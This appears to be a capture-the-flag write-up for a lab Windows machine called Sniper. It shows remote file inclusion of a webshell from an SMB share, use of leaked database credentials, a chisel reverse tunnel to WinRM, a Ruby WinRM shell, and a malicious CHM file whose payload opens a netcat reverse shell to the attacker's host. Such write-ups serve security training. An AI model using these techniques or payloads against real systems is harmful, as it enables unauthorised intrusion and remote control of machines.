Sniper - 10.10.10.151
Difficulty score: 6
28 Mar 2020Write-up by Entr0phy @Entr0phy
USER
We start from a scan with Nmap with service enumeration:
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 49667/tcp open msrpc Microsoft Windows RPC
So the actual running services are smb and a web appliation. Just inspect a bit the webapp as first.
It seems a webapplication of company for good delivery. And they also have a blog page. Interesting. The URL is even more interesting :)
Apparently it is calling a local file for the language, let’s try with a common file usually accessible on windows OS :
http://10.10.10.151/blog/?lang=\users\public\desktop\desktop.ini
We can read it. So now exploit this beauty. Let’s try to connect to our smb . At first rewrite our config for our smb server:
[sniper] path =YOUR_SMB_FOLDER browseable = yes read only = no guest ok = yes create mask = 777
Be sure that the permissions over all the files is actually 777 mask else this won’t work. Then restart the services .
systemctl restart smbd systemctl restart nmbd
I just placed a webshell inside my folder called index.php and I got it using the following URL : http://10.10.10.151/blog/?lang=\10.10.14.5\sniper\index.php
Enumerating bit we find an interesting file under C:\inetpub\wwwroot\user\ called db.php. Read it and we get some interesting credentials :)
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
Due to the fact that net user doesn’t seem to work, in order to discover the name of the user we hd to check under the folder C:\Users and discovered that the only other user is called Chris.
this works with smb :)
smbclient -L 10.10.10.151 -U Chris
Enter WORKGROUP\Chris's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
Unfortunately there is nothing interesting in the share in order to get persistence on the box. So I checked over netstat and I noticed that there is a winrm port open :D
Just pivot the hell out with chisel! I had to put chisel.exe binary on the smbshare to make this work ofc
on your pentestbox ==> chisel server -p 8000 --reverse from the webshell ==> \\YOUR_IP\sniper\chisel_windows_amd64.exe client YOUR_IP:8000 R:5985:127.0.0.1:5985
Then just user evil win-rm or a ruby shell for connect to winrm on your local port with those creds and you are in :)
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://127.0.0.1:5985/wsman',
user: 'Chris',
password: '36mEAhz/B8xQ~2VM'
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
ROOT
Normal enumeration does not highlight anything interesting. Let’s dig for custom/user files around the system. The first one is Instruction.chm under C:\Users\Chris\Downloads. Converting it to PDF shows the following content :
Sniper Android App Documentation Table of Contents Pff... This dumb CEO always makes me do all the shitty work. SMH! I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.
This seems an hint to me. Another one is under C:\Docs\note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
It says to actually drop here some documentation. And the other file was a chm file. Suspicious. Google gave me the answer soon enough
https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7
https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
So login into our Windows VM , install the windows html helper and the Out-CHM.ps1 script and execute the following commands:
Import-Module .\Out-CHM.ps1 Out-CHM -Payload "\\\\YOUR_IP\\sniper\\nc.exe YOUR_IP 443 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
just copy the produced chm inside the C:\Docs folder and wait for the reverse shell :()
And we rooted Sn1p3r!